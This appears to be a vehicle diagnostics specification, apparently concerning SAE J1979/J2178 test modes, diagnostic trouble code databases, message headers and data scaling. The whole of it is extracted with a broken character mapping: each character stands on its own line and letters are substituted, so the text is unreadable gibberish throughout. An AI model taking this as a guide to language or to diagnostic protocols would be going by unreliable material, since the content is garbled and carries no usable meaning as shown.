¡
¨
¡
a
È
¡
¨
N
h
È
¡
¨
N
a
È
¡
¨
N
Y
T
_
^
e
c
Y
S
¡
¨
¡
N
V
_
c
¡
¨
¡
h
È
•
U
e
_
S
`
V
_
`
S
t
e
Z
P
k
u
¡
¨
N
U
T
_
^
e
c
Y
S
¡
¨
¡
N
V
_
c
¡
¨
¡
h
È
•
`
Y
S
`
k
u
S
t
e
Z
^
e
c
Y
¡
¨
¡
w
È
•
^
T
_
T
^
]
^
È
^
V
¨
T
^
]
^
È
V
_
c
S
U
V
W
T
_
{
v
V
W
]
Y
S
t
e
Z
`
Y
S
`
S
T
_
^
e
c
Y
¡
¨
¡
w
f
T
_
]
_
T
£
Y
c
l
X
m
¤
c
Y
£
_
T
`
T
e
_
S
¦
g
È
•
`
Y
S
`
k
u
S
t
e
Z
^
e
c
Y
¡
¨
¡
ª
È
•
`
Y
S
`
k
u
S
t
e
Z
^
e
c
Y
¡
¨
¡
|
È
V
_
c
•
T
_
t
e
Z
^
V
`
T
e
_
`
R
}
Y
k
u
S
t
e
Z
^
e
c
Y
¡
¨
¡
O
u
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
S
Q
V
W
W
j
Y
Q
V
_
c
W
Y
c
S
Y
}
V
Z
V
`
Y
W
R
È
v
T
V
V
c
c
T
`
T
e
_
V
W
W
T
j
Z
V
Z
R
t
]
_
U
¢
`
T
e
_
S
È
S
e
`
Q
V
`
`
Q
Y
R
^
V
R
U
]
S
`
e
^
T
Y
c
`
e
Y
V
U
Q
v
Y
Q
T
U
W
Y
O
0
²
H
²
³
L
J
J
H
²
³
L
J
L
l
]
}
}
e
Z
`
t
e
Z
Y
_
Q
V
_
U
Y
c
c
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
¡
O
§
_
Q
V
_
U
Y
c
c
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
S
S
]
}
}
e
Z
`
V
Z
Y
`
Q
Y
t
e
W
W
e
r
T
_
{
•
d
e
c
Y
¡
¨
N
¡
k
_
T
`
T
V
`
Y
c
T
V
{
_
e
S
`
T
U
e
}
Y
Z
V
`
T
e
_
È
•
d
e
c
Y
¡
¨
N
N
[
Y
\
]
Y
S
`
^
e
c
]
W
Y
Z
Y
S
Y
`
È
N
n
•
d
e
c
Y
¡
¨
N
h
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
t
Z
Y
Y
Y
t
Z
V
^
Y
c
V
`
V
È
•
d
e
c
Y
¡
¨
N
a
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
T
_
t
e
Z
^
V
`
T
e
_
È
•
d
e
c
Y
¡
¨
N
n
o
W
Y
V
Z
c
T
V
{
_
e
S
`
T
U
T
_
t
e
Z
^
V
`
T
e
_
È
•
d
e
c
Y
¡
¨
N
y
[
Y
\
]
Y
S
`
S
`
V
`
]
S
e
t
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
È
•
d
e
c
Y
¡
¨
N
|
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
j
R
S
`
V
`
]
S
È
•
d
e
c
Y
¡
¨
h
¡
[
Y
`
]
Z
_
`
e
_
e
Z
^
V
W
e
}
Y
Z
V
`
T
e
_
È
•
d
e
c
Y
¡
¨
h
N
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
c
V
`
V
j
R
e
ë
S
Y
`
È
•
d
e
c
Y
¡
¨
h
h
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
c
V
`
V
j
R
}
V
Z
V
^
Y
`
Y
Z
T
c
Y
_
`
T
£
U
V
`
T
e
_
È
•
d
e
c
Y
¡
¨
h
a
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
c
V
`
V
j
R
^
Y
^
e
Z
R
V
c
c
Z
Y
S
S
È
•
d
e
c
Y
¡
¨
h
n
[
Y
\
]
Y
S
`
S
U
V
W
T
_
{
V
_
c
e
ë
S
Y
`
e
Z
P
k
u
È
•
d
e
c
Y
¡
¨
h
w
l
`
e
}
`
Z
V
_
S
^
T
`
`
T
_
{
Z
Y
\
]
Y
S
`
Y
c
c
V
`
V
È
•
d
e
c
Y
¡
¨
h
ª
l
}
Y
U
T
t
R
c
V
`
V
Z
V
`
Y
S
È
•
d
e
c
Y
¡
¨
h
y
l
Y
U
]
Z
T
`
R
V
U
U
Y
S
S
^
e
c
Y
È
•
d
e
c
Y
¡
¨
h
|
u
T
S
V
j
W
Y
_
e
Z
^
V
W
^
Y
S
S
V
{
Y
`
Z
V
_
S
^
T
S
S
T
e
_
È
•
d
e
c
Y
¡
¨
h
§
_
V
j
W
Y
_
e
Z
^
V
W
^
Y
S
S
V
{
Y
`
Z
V
_
S
^
T
S
S
T
e
_
È
•
d
e
c
Y
¡
¨
h
p
[
Y
\
]
Y
S
`
c
T
V
{
_
e
S
`
T
U
c
V
`
V
}
V
U
s
Y
`
f
S
g
È
•
d
e
c
Y
¡
¨
h
~
u
R
_
V
^
T
U
V
W
W
R
c
Y
£
_
Y
c
V
`
V
}
V
U
s
Y
`
j
R
S
T
_
{
W
Y
j
R
`
Y
e
ë
S
Y
`
S
È
•
d
e
c
Y
¡
¨
h
o
u
R
_
V
^
T
U
V
W
W
R
c
Y
£
_
Y
c
T
V
{
_
e
S
`
T
U
c
V
`
V
}
V
U
s
Y
`
È
•
d
e
c
Y
¡
¨
h
¥
k
_
}
]
`
©
e
]
`
}
]
`
U
e
_
`
Z
e
W
j
R
P
k
u
È
•
d
e
c
Y
¡
¨
a
¡
k
_
}
]
`
©
e
]
`
}
]
`
U
e
_
`
Z
e
W
j
R
c
V
`
V
v
V
W
]
Y
k
u
È
•
d
e
c
Y
¡
¨
a
N
P
Y
Z
t
e
Z
^
c
T
V
{
_
e
S
`
T
U
Z
e
]
`
T
_
Y
j
R
`
Y
S
`
_
]
^
j
Y
Z
1
S
`
V
Z
`
Z
e
]
`
T
_
Y
È
•
d
e
c
Y
¡
¨
a
h
P
Y
Z
t
e
Z
^
c
T
V
{
_
e
S
`
T
U
Z
e
]
`
T
_
Y
j
R
`
Y
S
`
_
]
^
j
Y
Z
1
S
`
e
}
Z
e
]
`
T
_
Y
È
•
d
e
c
Y
¡
¨
a
a
P
Y
Z
t
e
Z
^
c
T
V
{
_
e
S
`
T
U
Z
e
]
`
T
_
Y
j
R
`
Y
S
`
_
]
^
j
Y
Z
1
Z
Y
\
]
Y
S
`
Z
e
]
`
T
_
Y
Z
Y
S
]
W
`
S
È
•
d
e
c
Y
¡
¨
a
n
u
V
`
V
`
Z
V
_
S
t
Y
Z
1
c
e
r
_
W
e
V
c
f
`
e
e
W
`
e
^
e
c
]
W
Y
g
È
•
d
e
c
Y
¡
¨
a
w
u
V
`
V
`
Z
V
_
S
t
Y
Z
1
]
}
W
e
V
c
f^
e
c
]
W
Y
`
e
`
e
e
W
g
È
•
d
e
c
Y
¡
¨
a
ª
u
V
`
V
`
Z
V
_
S
t
Y
Z
1
`
Z
V
_
S
t
Y
Z
È
•
d
e
c
Y
¡
¨
a
y
u
V
`
V
`
Z
V
_
S
t
Y
Z
1
Y
¨
T
`
È
N
w
•
d
e
c
Y
¡
¨
a
|
P
Y
Z
t
e
Z
^
c
T
V
{
_
e
S
`
T
U
Z
e
]
`
T
_
Y
V
`
V
S
}
Y
U
T
£
Y
c
V
c
c
Z
Y
S
S
1
Y
_
`
Y
Z
Z
e
]
`
T
_
Y
È
•
d
e
c
Y
¡
¨
a
P
Y
Z
t
e
Z
^
c
T
V
{
_
e
S
`
T
U
Z
e
]
`
T
_
Y
V
`
V
S
}
Y
U
T
£
Y
c
V
c
c
Z
Y
S
S
1
Y
¨
T
`
Z
e
]
¢
`
T
_
Y
È
•
d
e
c
Y
¡
¨
a
p
P
Y
Z
t
e
Z
^
c
T
V
{
_
e
S
`
T
U
Z
e
]
`
T
_
Y
V
`
V
S
}
Y
U
T
£
Y
c
V
c
c
Z
Y
S
S
1
Z
Y
\
]
Y
S
`
Z
e
]
`
T
_
Y
Z
Y
S
]
W
`
S
È
•
d
e
c
Y
¡
¨
a
~
b
Z
T
`
Y
c
V
`
V
j
W
e
U
s
È
•
d
e
c
Y
¡
¨
a
o
¤
Y
S
`
c
Y
v
T
U
Y
}
Z
Y
S
Y
_
`
È
V
_
c
•
d
e
c
Y
¡
¨
y
¥
x
Y
_
Y
Z
V
W
Z
Y
S
}
e
_
S
Y
^
Y
S
S
V
{
Y
O
¥
e
Z
Y
V
U
Q
`
Y
S
`
^
e
c
Y
È
c
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
V
Z
Y
c
Y
£
_
Y
c
`
e
t
V
U
T
W
T
`
V
`
Y
t
e
Z
^
V
`
`
T
_
{
e
t
c
V
`
V
T
_
`
e
_
Y
`
r
e
Z
s
}
V
U
s
Y
`
S
t
e
Z
Z
Y
\
]
Y
S
`
S
V
_
c
c
Y
U
e
c
T
_
{
c
V
`
V
t
Z
e
^
Z
Y
}
W
T
Y
S
O
u
V
`
V
S
`
Z
]
U
¢
`
]
Z
Y
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
j
V
S
Y
c
e
_
`
Q
Y
t
e
Z
^
V
`
S
c
Y
£
_
Y
c
T
_
l
p
§
h
N
¡
O
p
W
W
^
e
c
Y
S
Y
¨
U
Y
}
`
^
e
c
Y
¡
¨
a
¥
V
_
c
¡
¨
y
¥
S
Q
V
W
W
Q
V
v
Y
V
Z
Y
\
]
Y
S
`
t
e
Z
^
V
`
V
_
c
V
Z
Y
}
W
R
t
e
Z
^
V
`
c
Y
£
_
Y
c
O
d
e
c
Y
S
¡
¨
N
a
È
¡
¨
N
y
È
¡
¨
N
|
Q
V
v
Y
V
_
V
c
c
T
`
T
e
_
V
W
Z
Y
}
W
R
t
e
Z
^
V
`
`
e
Z
Y
`
]
Z
_
`
Q
Y
_
]
^
j
Y
Z
e
t
u
¤
o
S
S
`
e
Z
Y
c
V
S
r
Y
W
W
V
S
`
Q
Y
V
U
`
]
V
W
u
¤
o
S
O
d
e
c
Y
¡
¨
h
y
Q
V
S
V
_
V
c
c
T
¢
`
T
e
_
V
W
W
R
Z
Y
}
W
R
t
e
Z
^
V
`
t
e
Z
e
}
`
T
e
_
V
W
V
c
c
T
`
T
e
_
V
W
Z
Y
}
W
R
c
V
`
V
O
d
e
c
Y
¡
¨
a
¥
Q
V
S
V
S
T
_
{
W
Y
Z
Y
\
]
Y
S
`
t
e
Z
^
V
`
O
d
e
c
Y
¡
¨
y
¥
Q
V
S
V
S
T
_
{
W
Y
Z
Y
S
}
e
_
S
Y
t
e
Z
^
V
`
È
`
Q
Y
{
Y
_
Y
Z
V
W
Z
Y
S
}
e
_
S
Y
`
Q
V
`
^
V
R
j
Y
]
S
Y
c
T
_
Z
Y
S
}
e
_
S
Y
`
e
V
_
R
Y
_
Q
V
_
U
Y
c
c
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
Z
Y
\
]
Y
S
`
O
¤
V
j
W
Y
S
e
t
U
e
_
S
`
V
_
`
S
r
T
W
W
j
Y
V
W
S
e
j
Y
c
Y
£
_
Y
c
j
V
S
Y
c
e
_
l
p
§
h
N
¡
O
¤
Q
Y
t
e
W
¢
W
e
r
T
_
{
`
V
j
W
Y
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
•
W
Y
v
Y
W
e
t
c
T
V
{
_
e
S
`
T
U
S
t
e
Z
^
e
c
Y
¡
¨
N
¡
È
•
j
T
`
^
V
}
}
Y
c
S
`
V
`
]
S
c
V
`
V
t
e
Z
^
e
c
Y
¡
¨
N
|
È
•
Z
Y
S
}
e
_
S
Y
Z
Y
}
Y
V
`
e
}
`
T
e
_
S
t
e
Z
^
e
c
Y
S
¡
¨
h
N
È
¡
¨
h
h
È
V
_
c
¡
¨
h
a
È
•
S
U
V
W
T
_
{
j
R
`
Y
S
t
e
Z
^
e
c
Y
¡
¨
h
n
fc
Y
£
_
Y
c
T
_
{
Y
_
Y
Z
V
W
l
X
m
¤
S
¦
g
È
•
c
V
`
Y
Z
V
`
Y
U
e
_
S
`
V
_
`
S
t
e
Z
^
e
c
Y
¡
¨
h
ª
È
•
c
R
_
V
^
T
U
}
V
U
s
Y
`
c
Y
£
_
T
`
T
e
_
S
t
e
Z
^
e
c
Y
¡
¨
h
o
È
V
_
c
•
Z
Y
S
}
e
_
S
Y
U
e
c
Y
S
t
e
Z
^
e
c
Y
¡
¨
y
¥
O
u
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
S
Q
V
W
W
j
Y
Q
V
_
c
W
Y
c
S
Y
}
V
Z
V
`
Y
W
R
È
v
T
V
V
c
c
T
`
T
e
_
V
W
W
T
j
Z
V
Z
R
t
]
_
U
¢
`
T
e
_
S
È
S
e
`
Q
V
`
`
Q
Y
R
^
V
R
U
]
S
`
e
^
T
Y
c
`
e
Y
V
U
Q
v
Y
Q
T
U
W
Y
O
G
L
H
J
L
I
H
²
J
µ
H
³
L
J
L
³
J
L
l
]
}
}
e
Z
`
t
e
Z
Q
Y
V
c
Y
Z
V
_
c
}
V
U
s
Y
`
c
Y
U
e
c
Y
V
S
S
}
Y
U
¢
T
£
Y
c
T
_
l
p
§
N
|
w
¡
È
l
p
§
h
N
y
|
¢
N
O
u
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
V
Z
Y
c
Y
£
_
Y
c
`
e
t
V
U
T
W
T
`
V
`
Y
t
e
Z
^
V
`
`
T
_
{
e
t
c
V
`
V
T
_
`
e
_
Y
`
r
e
Z
s
}
V
U
s
Y
`
S
t
e
Z
Z
Y
\
]
Y
S
`
S
V
_
c
c
Y
U
e
c
T
_
{
c
V
`
V
t
Z
e
^
Z
Y
}
W
T
Y
S
O
u
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
c
Y
£
_
Y
c
V
Z
Y
`
Q
Y
t
e
W
W
e
r
T
_
{
•
S
T
_
{
W
Y
j
R
`
Y
Q
Y
V
c
Y
Z
È
N
ª
•
e
_
Y
j
R
`
Y
U
e
_
S
e
W
T
c
V
`
Y
c
Q
Y
V
c
Y
Z
È
V
_
c
•
`
Q
Z
Y
Y
j
R
`
Y
U
e
_
S
e
W
T
c
V
`
Y
c
Q
Y
V
c
Y
Z
O
¤
V
j
W
Y
S
e
t
U
e
_
S
`
V
_
`
S
V
Z
Y
c
Y
£
_
Y
c
t
e
Z
`
Q
Y
t
e
W
W
e
r
T
_
{
T
_
t
e
Z
^
V
`
T
e
_
•
Q
Y
V
c
Y
Z
2
V
{
S
È
•
^
Y
S
S
V
{
Y
`
R
}
Y
S
È
•
^
Y
S
S
V
{
Y
e
}
Y
Z
V
`
T
e
_
S
È
•
Y
¨
`
Y
_
c
Y
c
V
c
c
Z
Y
S
S
T
_
{
`
R
}
Y
S
È
V
_
c
•
{
Y
e
{
Z
V
}
Q
T
U
V
W
V
c
c
Z
Y
S
S
^
V
}
O
¹
/
³
H
¯
H
J
J
I
L
¯
´
µ
P
Q
R
S
T
U
V
W
V
c
c
Z
Y
S
S
T
_
{
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
N
O
l
`
V
_
c
V
Z
c
c
Y
£
_
Y
c
`
R
}
Y
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
V
S
r
Y
W
W
V
S
^
V
_
]
t
V
U
`
]
Z
Y
Z
S
}
Y
U
T
£
U
V
c
¢
c
Z
Y
S
S
Y
S
O
p
c
c
Z
Y
S
S
Y
S
r
T
W
W
j
Y
^
V
T
_
`
V
T
_
Y
c
T
_
V
_
Y
¨
`
Y
_
S
T
j
W
Y
c
V
`
V
j
V
S
Y
`
e
V
W
W
e
r
V
]
S
Y
Z
`
e
Y
V
S
T
W
R
}
Z
e
v
T
c
Y
V
c
c
T
`
T
e
_
V
W
V
c
c
Z
Y
S
S
T
_
t
e
Z
^
V
`
T
e
_
O
H
H
µ
H
I
H
L
L
I
H
²
L
²
J
H
H
H
L
l
]
}
}
e
Z
`
c
V
`
V
}
V
Z
V
^
Y
`
Y
Z
c
Y
£
_
T
`
T
e
_
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
h
O
u
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
V
_
c
`
V
j
W
Y
S
e
t
U
e
_
S
`
V
_
`
S
V
Z
Y
c
Y
¢
£
_
Y
c
`
e
t
V
U
T
W
T
`
R
c
Y
U
e
c
Y
`
Q
Y
v
V
Z
T
e
]
S
c
V
`
V
}
V
Z
V
^
Y
`
Y
Z
V
S
S
T
{
_
^
Y
_
`
S
O
b
Q
Y
Z
Y
V
}
¢
}
W
T
U
V
j
W
Y
È
^
V
_
]
t
V
U
`
]
Z
Y
Z
c
Y
£
_
T
`
T
e
_
S
V
Z
Y
S
]
}
}
e
Z
`
Y
c
V
_
c
c
Y
£
_
Y
c
S
Y
}
V
Z
V
`
Y
W
R
t
Z
e
^
S
`
V
_
c
V
Z
c
c
Y
£
_
T
`
T
e
_
S
O
¤
Q
Y
t
e
W
W
e
r
T
_
{
c
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
V
Z
Y
c
Y
£
_
Y
c
P
k
u
j
T
`
^
V
}
¢
}
T
_
{
O
¥
e
Z
Y
V
S
Y
e
t
c
T
V
{
_
e
S
`
T
U
S
È
c
V
`
V
T
S
Z
Y
t
Y
Z
Y
_
U
Y
c
V
U
U
e
Z
c
T
_
{
`
e
`
Q
Y
}
V
Z
V
^
Y
`
Y
Z
Z
Y
t
Y
Z
¢
Y
_
U
Y
_
]
^
j
Y
Z
fP
[
q
g
S
`
Z
]
U
`
]
Z
Y
O
p
`
V
j
W
Y
e
t
P
[
q
{
Z
e
]
}
T
_
{
S
T
S
c
Y
£
_
Y
c
È
V
S
r
Y
W
W
V
S
c
Y
`
V
T
W
Y
c
P
[
q
V
S
S
T
{
_
^
Y
_
`
S
t
e
Z
`
Q
Y
t
e
W
W
e
r
T
_
{
{
Z
e
]
}
S
•
l
p
§
N
y
U
e
^
}
V
`
T
j
W
Y
È
•
Y
_
{
T
_
Y
È
•
`
Z
V
_
S
^
T
S
S
T
e
_
È
•
j
Z
V
s
Y
S
©
`
T
Z
Y
S
©
r
Q
Y
Y
W
S
È
•
S
`
Y
Y
Z
T
_
{
È
•
S
]
S
}
Y
_
S
T
e
_
È
•
Z
Y
S
`
Z
V
T
_
`
S
È
•
c
Z
T
v
Y
Z
T
_
t
e
Z
^
V
`
T
e
_
È
•
z
i
p
o
È
•
U
e
_
v
Y
_
T
Y
_
U
Y
È
N
y
•
S
Y
U
]
Z
T
`
R
È
•
Y
W
Y
U
`
Z
T
U
v
Y
Q
T
U
W
Y
Y
_
Y
Z
{
R
`
Z
V
_
S
t
Y
Z
S
R
S
`
Y
^
È
•
U
e
_
£
{
]
Z
V
`
T
e
_
U
e
c
Y
S
È
V
_
c
•
^
T
S
U
Y
W
W
V
_
Y
e
]
S
O
i
V
W
]
Y
S
V
Z
Y
S
}
Y
U
T
£
Y
c
V
U
U
e
Z
c
T
_
{
`
e
`
Q
Y
S
U
V
W
T
_
{
È
W
T
^
T
`
È
e
ë
S
Y
`
È
V
_
c
`
Z
V
_
S
t
Y
Z
t
]
_
U
`
T
e
_
f
l
X
m
¤
g
c
Y
£
_
T
`
T
e
_
S
O
¤
Q
T
S
}
Z
e
v
T
c
Y
S
`
Q
Y
^
Y
V
_
T
_
{
t
e
Z
V
_
R
}
V
Z
`
T
U
]
W
V
Z
c
V
`
V
O
¤
Q
Y
t
e
W
W
e
r
T
_
{
l
X
m
¤
c
Y
£
_
T
`
T
e
_
S
V
Z
Y
]
S
Y
c
•
}
V
U
s
Y
`
Y
c
fP
¤
g
È
•
j
T
`
^
V
}
}
Y
c
r
T
`
Q
e
]
`
^
V
S
s
f~
d
P
g
È
•
]
_
S
T
{
_
Y
c
_
]
^
Y
Z
T
U
f·
q
d
g
è
Y
Z
e
È
è
S
Q
e
Z
`
f
3
|
j
T
`
g
È
è
|
j
T
`
È
è
N
ª
j
T
`
È
è
h
n
j
T
`
È
è
a
h
j
T
`
È
•
`
r
e
4S
U
e
^
}
W
Y
^
Y
_
`
S
T
{
_
Y
c
_
]
^
Y
Z
T
U
f
l
q
d
g
È
V
_
c
•
S
`
V
`
Y
Y
_
U
e
c
Y
c
f
l
§
u
g
O
²
¯
L
/
L
L
H
J
L
I
L
H
L
l
]
}
}
e
Z
`
t
e
Z
S
T
_
{
W
Y
j
R
`
Y
^
Y
S
S
V
{
Y
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
a
O
p
`
V
j
W
Y
e
t
U
e
_
S
`
V
_
`
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
t
Z
V
^
Y
k
u
S
t
e
Z
V
W
W
e
_
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
È
j
e
`
Q
S
T
_
{
W
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
V
_
c
U
e
_
S
e
W
T
c
V
`
Y
c
`
Q
Z
Y
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
O
p
`
V
j
W
Y
e
t
U
e
_
S
`
V
_
`
S
S
Q
V
W
W
V
W
S
e
j
Y
c
Y
£
_
Y
c
t
e
Z
`
Q
Y
S
Y
U
e
_
c
V
Z
R
k
u
S
t
e
Z
Y
W
Y
U
`
Z
T
U
v
Y
Q
T
U
W
Y
Y
_
Y
Z
{
R
`
Z
V
_
S
t
Y
Z
S
R
S
`
Y
^
f
§
i
¢
§
¤
l
g
^
Y
S
S
V
{
Y
S
O
.
I
L
L
/
L
L
H
J
L
I
L
H
L
l
]
}
}
e
Z
`
t
e
Z
`
Q
Z
Y
Y
j
R
`
Y
Q
Y
V
c
Y
Z
^
Y
S
S
V
{
Y
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
n
O
p
`
V
j
W
Y
e
t
U
e
_
S
`
V
_
`
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
}
Z
T
^
V
Z
R
k
u
S
t
e
Z
t
]
_
U
`
T
e
_
V
W
V
c
c
Z
Y
S
S
T
_
{
r
T
`
Q
`
Q
Z
Y
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
O
p
c
c
T
`
T
e
_
V
W
W
R
È
`
V
j
W
Y
S
e
t
S
Y
U
e
_
c
V
Z
R
k
u
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
`
Q
Y
t
e
W
W
e
r
T
_
{
^
Y
S
S
V
{
Y
`
R
}
Y
S
•
Y
_
{
T
_
Y
`
e
Z
\
]
Y
È
•
Y
_
{
T
_
Y
V
T
Z
T
_
`
V
s
Y
È
•
`
Q
Z
e
`
`
W
Y
È
•
V
T
Z
U
e
_
c
T
`
T
e
_
T
_
{
U
W
]
`
U
Q
È
N
|
•
Y
_
{
T
_
Y
[
P
d
È
•
r
Q
Y
Y
W
S
È
•
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
È
•
`
Z
V
U
`
T
e
_
U
e
_
`
Z
e
W
È
•
j
Z
V
s
Y
S
È
•
S
`
Y
Y
Z
T
_
{
È
•
`
Z
V
_
S
^
T
S
S
T
e
_
È
•
Y
_
{
T
_
Y
S
Y
_
S
e
Z
S
1
e
`
Q
Y
Z
È
•
Y
_
{
T
_
Y
U
e
e
W
V
_
`
È
•
Y
_
{
T
_
Y
e
T
W
È
•
Y
_
{
T
_
Y
S
R
S
`
Y
^
S
1
e
`
Q
Y
Z
È
•
S
]
S
}
Y
_
S
T
e
_
È
•
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
U
e
_
`
Z
e
W
È
•
Y
W
Y
U
`
Z
T
U
v
Y
Q
T
U
W
Y
Y
_
Y
Z
{
R
`
Z
V
_
S
t
Y
Z
S
R
S
`
Y
^
È
•
U
Q
V
Z
{
T
_
{
S
R
S
`
Y
^
È
•
Y
W
Y
U
`
Z
T
U
V
W
Y
_
Y
Z
{
R
^
V
_
V
{
Y
^
Y
_
`
È
•
e
c
e
^
Y
`
Y
Z
È
•
t
]
Y
W
S
R
S
`
Y
^
È
•
T
{
_
T
`
T
e
_
S
r
T
`
U
Q
©
S
`
V
Z
`
Y
Z
È
•
`
Y
W
W
`
V
W
Y
S
È
•
U
W
T
^
V
`
Y
U
e
_
`
Z
e
W
f
z
i
p
o
g
È
•
r
T
_
c
e
r
r
T
}
Y
Z
©
r
V
S
Q
Y
Z
È
•
^
T
Z
Z
e
Z
S
È
•
c
e
e
Z
W
e
U
s
S
È
•
Y
¨
`
Y
Z
_
V
W
V
U
U
Y
S
S
È
•
S
Y
V
`
^
e
`
T
e
_
©
U
e
_
`
Z
e
W
È
•
r
T
_
c
e
r
S
È
•
S
`
Y
Y
Z
T
_
{
U
e
W
]
^
_
È
N
•
S
Y
V
`
S
r
T
`
U
Q
Y
S
È
•
Z
Y
S
`
Z
V
T
_
`
S
È
•
Y
¨
`
Y
Z
T
e
Z
W
V
^
}
S
e
]
`
V
{
Y
È
•
Y
¨
`
Y
Z
T
e
Z
W
V
^
}
S
È
•
T
_
`
Y
Z
T
e
Z
W
V
^
}
S
e
]
`
V
{
Y
È
•
T
_
`
Y
Z
T
e
Z
W
V
^
}
S
È
•
`
T
Z
Y
S
È
•
c
Y
t
Z
e
S
`
È
•
c
T
S
}
W
V
R
S
È
•
Y
¨
`
Y
Z
T
e
Z
Y
_
v
T
Z
e
_
^
Y
_
`
È
•
T
_
`
Y
Z
T
e
Z
Y
_
v
T
Z
e
_
^
Y
_
`
È
•
`
T
^
Y
©
c
V
`
Y
È
•
v
Y
Q
T
U
W
Y
T
c
Y
_
`
T
£
U
V
`
T
e
_
È
V
_
c
•
_
Y
`
r
e
Z
s
U
e
_
`
Z
e
W
O
¤
V
j
W
Y
S
r
T
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
Y
¨
`
Y
_
c
Y
c
V
c
c
Z
Y
S
S
Y
S
t
e
Z
Y
V
U
Q
e
t
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
`
T
e
_
•
j
Z
V
s
Y
S
È
`
T
Z
Y
S
È
V
_
c
r
Q
Y
Y
W
S
È
•
z
i
p
o
e
_
Y
S
È
•
r
T
_
c
e
r
r
T
}
Y
Z
©
r
V
S
Q
Y
Z
È
c
Y
t
Z
e
S
`
È
}
Q
e
`
e
U
Y
W
W
È
•
c
e
e
Z
S
V
_
c
c
e
e
Z
W
e
U
s
S
È
•
S
Y
V
`
S
V
_
c
Z
Y
S
`
Z
V
T
_
`
S
È
•
r
T
_
c
e
r
S
È
•
Y
¨
`
Y
Z
_
V
W
W
V
^
}
S
È
V
_
c
•
T
_
`
Y
Z
_
V
W
W
V
^
}
S
O
H
²
³
I
´
¯
L
³
J
L
J
H
H
H
L
l
]
}
}
e
Z
`
t
e
Z
V
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
fu
¤
o
g
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
¡
N
h
O
p
c
V
`
V
j
V
S
Y
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
`
e
S
`
e
Z
Y
V
_
c
^
V
_
V
{
Y
u
¤
o
S
V
S
c
Y
£
_
Y
c
j
R
S
`
V
_
c
V
Z
c
S
V
S
r
Y
W
W
V
S
j
R
^
V
_
]
t
V
U
`
]
Z
Y
Z
O
¤
Q
Y
c
V
`
V
j
V
S
Y
S
r
T
W
W
j
Y
T
_
V
t
e
Z
^
`
Q
V
`
U
V
_
j
Y
]
}
c
V
`
Y
c
Y
V
S
T
W
R
V
`
Z
]
_
`
T
^
Y
j
R
`
Q
Y
]
S
Y
Z
O
¤
Q
Y
c
V
`
V
j
V
S
Y
S
U
Q
Y
^
V
t
e
Z
S
`
e
Z
T
_
{
u
¤
o
S
T
S
S
}
Y
U
T
£
Y
c
T
_
`
V
j
W
Y
O
¤
Q
Y
c
V
`
V
j
V
S
Y
V
U
U
Y
S
S
t
]
_
U
`
T
e
_
S
r
T
W
W
}
Z
e
v
T
c
Y
S
R
S
`
Y
^
{
Z
e
]
}
T
_
t
e
Z
^
V
`
T
e
_
r
Q
Y
_
V
_
]
_
s
_
e
r
_
u
¤
o
T
S
Z
Y
\
]
Y
S
`
Y
c
O
¤
Q
Y
c
V
`
V
j
V
S
Y
r
T
W
W
}
Z
e
v
T
c
Y
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
¢
`
T
e
_
S
-
J
³
¯
´
µ
[
Y
`
]
Z
_
S
V
c
T
V
{
_
e
S
`
T
U
^
Y
S
S
V
{
Y
t
Z
e
^
W
e
e
s
T
_
{
]
}
`
Q
Y
S
}
Y
U
T
£
Y
c
u
¤
o
T
_
`
Q
Y
c
V
`
V
j
V
S
Y
O
h
¡
^
Y
^
j
Y
Z
c
Y
S
U
Z
T
}
`
T
e
_
c
`
U
u
¤
o
S
}
Y
U
T
£
Y
c
T
_
V
W
W
_
]
^
Y
Z
T
U
t
e
Z
^
V
`
f
P
¡
¡
¡
¡
T
S
¡
¡
¡
¡
g
O
^
Y
S
S
V
{
Y
u
Y
S
U
Z
T
}
`
T
e
_
O
¤
V
j
W
Y
N
h
u
¤
o
u
V
`
V
j
V
S
Y
l
U
Q
Y
^
V
ÿ
M
ÿ°
²
²
,
